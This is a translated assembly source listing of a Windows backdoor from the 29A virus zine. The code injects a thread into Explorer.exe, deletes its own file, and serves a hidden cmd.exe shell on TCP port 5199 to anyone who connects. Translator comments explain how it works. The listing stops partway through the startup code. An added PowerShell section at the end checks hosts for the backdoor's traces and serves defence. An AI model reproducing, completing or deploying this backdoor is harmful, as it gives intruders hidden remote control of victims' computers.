; Tiny NT Backdoor by aphex
; http://www.iamaphex.cjb.net
; unremote@knology.net
; original: 29A #7 [index - utilities - tiny nt backdoor (aphex)]
; translation: icyfox [冰狐子] / CVC translation team
;
; [Translator's foreword: my skills are limited, so in order to support CVC's translation work
;  I decided to find something that hardly needs translating. I only convey the original meaning
;  rather than translating word for word, and I have added a few more comments to the source code.
;  I hope everyone will support it; I will keep working hard for the newcomers ^@^. Let's begin!]
;
; This program inserts a remote thread into the Explorer.exe process and deletes itself from
; within that thread, so it leaves no trace on disk. The inserted thread provides a cmd.exe pipe
; for each connection, used to execute commands; when the connection is dropped, the cmd.exe
; process is terminated. The link command is as follows:
;
; [Translator's note: 0x13140000 is the base address, and it is the key to the whole thing; this
;  program relies on it. Change the base and the code can no longer locate itself!]
;
; Linker options: /base:0x13140000 /filealign:0x200 /merge:.data=.text /section:windows /libpath:\masm32\lib backdoor.obj

.386
.model flat, stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\wsock32.inc
includelib \masm32\lib\wsock32.lib

.data
szTarget      byte 'Shell_TrayWnd', 0   ; used to find the Explorer.exe process
szUser32      byte 'user32.dll', 0      ; these two DLLs are loaded inside the remote thread
szWinsock     byte 'wsock32.dll', 0     ; seems unnecessary, Explorer.exe has already loaded it
szCommandLine byte 'cmd.exe', 0
szSharedData  byte 261 dup (0)          ; holds our own path, used for self-deletion

.data?
hModule        dword ?
hNewModule     dword ?
hProcess       dword ?
dwSize         dword ?
dwPID          dword ?
dwBytesWritten dword ?
dwTID          dword ?
WSAData        WSADATA <>

.code

; each connection gets its own cmd pipe, served by ShellClient
ShellClient proc dwSock:dword
local sat:SECURITY_ATTRIBUTES
local hiRead:dword
local hoRead:dword
local hiWrite:dword
local hoWrite:dword
local startupinfo:STARTUPINFO
local processinfo:PROCESS_INFORMATION
local exitcode:dword
local buffer[1024]:byte
local bytes:dword
local available:dword
local data:dword

    mov sat.nLength, sizeof SECURITY_ATTRIBUTES
    mov sat.lpSecurityDescriptor, 0
    mov sat.bInheritHandle, TRUE
    ; create anonymous pipes for stdin and stdout
    invoke CreatePipe, addr hiRead, addr hiWrite, addr sat, 0
    invoke CreatePipe, addr hoRead, addr hoWrite, addr sat, 0
    ; create the cmd process with the pipes as its standard handles,
    ; so commands can be executed and their results returned
    invoke GetStartupInfo, addr startupinfo
    mov startupinfo.cb, sizeof STARTUPINFO
    mov eax, hoWrite
    mov startupinfo.hStdOutput, eax
    mov startupinfo.hStdError, eax
    mov eax, hiRead
    mov startupinfo.hStdInput, eax
    mov startupinfo.dwFlags, STARTF_USESHOWWINDOW or STARTF_USESTDHANDLES
    mov startupinfo.wShowWindow, SW_HIDE
    invoke CreateProcess, 0, addr szCommandLine, 0, 0, TRUE, CREATE_NEW_CONSOLE, 0, 0, addr startupinfo, addr processinfo
    invoke CloseHandle, hoWrite
    invoke CloseHandle, hiRead
    mov bytes, 1
    invoke ioctlsocket, dwSock, FIONBIO, addr bytes    ; non-blocking mode
    .while TRUE
        invoke Sleep, 1
        ; close the connection once the cmd process has terminated
        invoke GetExitCodeProcess, processinfo.hProcess, addr exitcode
        .if exitcode != STILL_ACTIVE
            .break
        .endif
        ; read the command output and send it
        invoke PeekNamedPipe, hoRead, addr buffer, 1024, addr bytes, addr available, 0
        .if bytes != 0
            .if available > 1024
                .while bytes >= 1024
                    invoke Sleep, 1
                    invoke ReadFile, hoRead, addr buffer, 1024, addr bytes, 0
                    .if bytes != 0
                        invoke send, dwSock, addr buffer, bytes, 0
                    .endif
                .endw
            .else
                invoke ReadFile, hoRead, addr buffer, 1024, addr bytes, 0
                .if bytes != 0
                    invoke send, dwSock, addr buffer, bytes, 0
                .endif
            .endif
        .endif
        ; receive commands and write them into the pipe to be executed
        invoke recv, dwSock, addr buffer, 1024, 0
        .if eax == SOCKET_ERROR || eax == 0
            invoke WSAGetLastError
            .if eax == WSAEWOULDBLOCK
                .continue
            .else
                invoke TerminateProcess, processinfo.hProcess, 0   ; connection dropped: end the cmd process
                .break
            .endif
        .else
            mov edx, eax
            invoke WriteFile, hiWrite, addr buffer, edx, addr bytes, 0
            ; [translator: a send could be added here, so that the command you typed is not shown
            ;  and only the result is seen; it looks like an echo ^8^]
        .endif
    .endw
    ; close the pipes and the connection
    invoke CloseHandle, hiWrite
    invoke CloseHandle, hoRead
    invoke closesocket, dwSock
    ret
ShellClient endp

; Shelld: entry point of the remote thread
Shelld proc
local SockAddrIn:sockaddr_in
local dwSock:dword
local dwMode:dword

    invoke DeleteFile, addr szSharedData    ; self-delete
    invoke LoadLibrary, addr szUser32       ; load the DLLs
    invoke LoadLibrary, addr szWinsock      ; seems unnecessary
    ; initialise Winsock and listen on port 5199
    invoke WSAStartup, 101h, addr WSAData
    invoke socket, PF_INET, SOCK_STREAM, 0
    mov dwSock, eax
    mov SockAddrIn.sin_family, AF_INET
    invoke htons, 5199
    mov SockAddrIn.sin_port, ax
    mov SockAddrIn.sin_addr, INADDR_ANY
    invoke bind, dwSock, addr SockAddrIn, sizeof SockAddrIn
    mov dwMode, 1
    invoke ioctlsocket, dwSock, FIONBIO, addr dwMode
    invoke listen, dwSock, SOMAXCONN
@@:
    invoke accept, dwSock, addr SockAddrIn, 0
    .if eax != INVALID_SOCKET
        mov edx, eax
        ; create a thread to handle the accepted connection: ShellClient
        invoke CreateThread, 0, 0, addr ShellClient, edx, 0, 0
        invoke CloseHandle, eax
    .endif
    invoke Sleep, 1000
    jmp @B
    ret
Shelld endp

start:
    ; read the base address and size of our own memory image
    invoke GetModuleHandle, 0
    mov hModule, eax        ; the base is saved here
    mov edi, eax
    assume edi:ptr IMAGE_DOS_HEADER
    add edi, [edi].e_lfanew
    add edi, sizeof dword
    add edi, sizeof IMAGE_FILE_HEADER
    assume edi:ptr IMAGE_OPTIONAL_HEADER32
    mov eax, [edi].SizeOfImage
    mov dwSize, eax
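The behaviour described in the header (a thread inside Explorer.exe that listens on TCP 5199 and spawns a hidden cmd.exe per connection) is what a defender can hunt for on a host. The PowerShell below is an added example and not part of the original article or aphex's code; it assumes Windows 8 / Server 2012 or later (for Get-NetTCPConnection) and an elevated prompt so that socket ownership is visible for every process.

```powershell
# Added example (not from the original article): look for the two artefacts the
# article's design leaves on a live system. Nothing here implements the backdoor;
# it only inspects process and socket state.
# Assumptions: Windows 8+/Server 2012+, run from an elevated prompt.

function Get-ExplorerListeningSockets {
    # explorer.exe has no legitimate reason to own a listening TCP socket.
    # The article's thread binds 5199, but any listener owned by explorer.exe
    # is anomalous, so do not filter on the port.
    $explorerPids = @(Get-Process -Name explorer -ErrorAction SilentlyContinue).Id
    Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
        Where-Object { $explorerPids -contains $_.OwningProcess } |
        Select-Object LocalAddress, LocalPort, OwningProcess
}

function Get-HiddenCmdChildrenOfExplorer {
    # Per connection the article creates cmd.exe with SW_HIDE and its standard
    # handles redirected to pipes. A user-launched cmd.exe is also a child of
    # explorer.exe, so the distinguishing feature is the missing console window.
    $procs = Get-CimInstance Win32_Process
    $explorerPids = @($procs | Where-Object Name -eq 'explorer.exe').ProcessId
    $procs |
        Where-Object { $_.Name -eq 'cmd.exe' -and $explorerPids -contains $_.ParentProcessId } |
        ForEach-Object {
            $p = Get-Process -Id $_.ProcessId -ErrorAction SilentlyContinue
            [pscustomobject]@{
                ProcessId   = $_.ProcessId
                ParentPid   = $_.ParentProcessId
                CommandLine = $_.CommandLine
                HasWindow   = ($null -ne $p -and $p.MainWindowHandle -ne 0)
            }
        } |
        Where-Object { -not $_.HasWindow }
}

Get-ExplorerListeningSockets  | Format-Table -AutoSize
Get-HiddenCmdChildrenOfExplorer | Format-Table -AutoSize
```

On the NT 4 / Windows 2000 systems the original targeted, the same socket check is `netstat -ano` matched against the PID of explorer.exe.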